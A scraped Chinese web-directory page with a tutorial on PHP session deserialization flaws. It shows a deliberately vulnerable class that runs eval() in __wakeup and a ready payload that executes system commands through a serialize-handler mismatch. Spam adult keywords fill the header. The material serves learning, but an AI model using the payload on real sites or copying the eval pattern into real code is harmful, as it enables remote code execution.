日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

公告:魔扣目錄網(wǎng)為廣大站長提供免費收錄網(wǎng)站服務(wù),提交前請做好本站友鏈:【 網(wǎng)站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(wù)(50元/站),

點擊這里在線咨詢客服
新站提交
  • 網(wǎng)站:52000
  • 待審:37
  • 小程序:12
  • 文章:1037587
  • 會員:756

目錄

    PHP session

    php三種序列化處理器

    php小編魚仔今天為大家?guī)硪黄P(guān)于php session反序列化漏洞的深入探究文章。php session機制是web開發(fā)中非常重要的一環(huán),然而不當(dāng)?shù)氖褂脮?dǎo)致一些安全隱患,其中session反序列化漏洞就是一種常見的攻擊方式,可能導(dǎo)致嚴(yán)重后果。本文將深入探究這種漏洞的原理、危害以及預(yù)防措施,幫助廣大web開發(fā)者更好地保障自己的系統(tǒng)安全。

    PHP session

    php session 反序列化漏洞存在的原因:當(dāng)序列化session和讀取反序列化字符時采用的序列化選擇器不一樣時,處理的方法不一樣。

    php小編魚仔今天為大家?guī)硪黄P(guān)于php session反序列化漏洞的深入探究文章。php session機制是web開發(fā)中非常重要的一環(huán),然而不當(dāng)?shù)氖褂脮?dǎo)致一些安全隱患,其中session反序列化漏洞就是一種常見的攻擊方式,可能導(dǎo)致嚴(yán)重后果。本文將深入探究這種漏洞的原理、危害以及預(yù)防措施,幫助廣大web開發(fā)者更好地保障自己的系統(tǒng)安全。

    php三種序列化處理器

    序列化處理器
    php ? ??? ??? ?(php默認(rèn)中使用的序列化) ? 存儲格式為:鍵名 + 豎線 + 經(jīng)過serialize()函數(shù)反序列化處理的值

    php_binary ? 存儲格式:鍵名的長度對應(yīng)的ASCII字符 + 鍵名 + 經(jīng)過serialize()函數(shù)反序列化處理的值

    php_serialize 在php版本>5.5.4中可以選擇使用 ? 存儲格式:經(jīng)過serialize()函數(shù)反序列處理的數(shù)組

    通過php.ini 可以設(shè)置保存路徑配置 php session 參數(shù)是 session.save_path=“保存路徑”

    php 中配置session序列化處理器通過ini_set()方法進行選擇 :ini_set(‘session.serialize_handler’, ‘處理器’);

    生成session php_serialize序列化處理器

    demo2.php
    <?php
    ini_set('session.serialize_handler', 'php_serialize');
    session_start();//創(chuàng)建一個session 會話(當(dāng)客戶端第一次訪問時會生成一個隨機的session文件在指定保存目錄中)
    $_SESSION['session'] = $_GET['k'];
    var_dump($_SESSION);
    

    登錄后復(fù)制

    訪問該頁面

    查看session 文件保存路徑,生成了一個sess_一串隨機字符的文件,打開文件查看,從get提交的值以序列化的格式存儲到該文件。

    在讀取session時使用不一樣的序列化處理器,使用php_serialize 序列化處理會把 符號 “|“作為一個正常的字符處理。而php序列化處理器會把”|” 當(dāng)成分割符處理。

    ctf.php
    <?php
    ini_set('session.serialize_handler', 'php');
    session_start();
    class test{
    public $name;
    function __wakeup(){
    eval($this->name);
    }
    }
    

    登錄后復(fù)制

    構(gòu)造成反序列化payload為:k=|O:4:“test”:1:{s:4:“name”;s:17:“system(‘dir’);”;}

    訪問demo2.php

    查看sess文件內(nèi)容:| 分割符被傳遞了進去

    再訪問ctf.php,觸發(fā)了__wakeup函數(shù)從而執(zhí)行了eval代碼執(zhí)行命令,由于使用不同的序列化處理器來處理session文件,序列化對特殊符號的處理方法不一樣,從而導(dǎo)致產(chǎn)生了漏洞

分享到:
標(biāo)簽:PHPsession 序列化 探究 漏洞
用戶無頭像

網(wǎng)友整理

注冊時間:

網(wǎng)站:5 個   小程序:0 個  文章:12 篇

  • 52000

    網(wǎng)站

  • 12

    小程序

  • 1037587

    文章

  • 756

    會員

趕快注冊賬號,推廣您的網(wǎng)站吧!
最新入駐小程序

數(shù)獨大挑戰(zhàn)2018-06-03

數(shù)獨一種數(shù)學(xué)游戲,玩家需要根據(jù)9

答題星2018-06-03

您可以通過答題星輕松地創(chuàng)建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學(xué)四六

運動步數(shù)有氧達(dá)人2018-06-03

記錄運動步數(shù),積累氧氣值。還可偷

每日養(yǎng)生app2018-06-03

每日養(yǎng)生,天天健康

體育訓(xùn)練成績評定2018-06-03

通用課目體育訓(xùn)練成績評定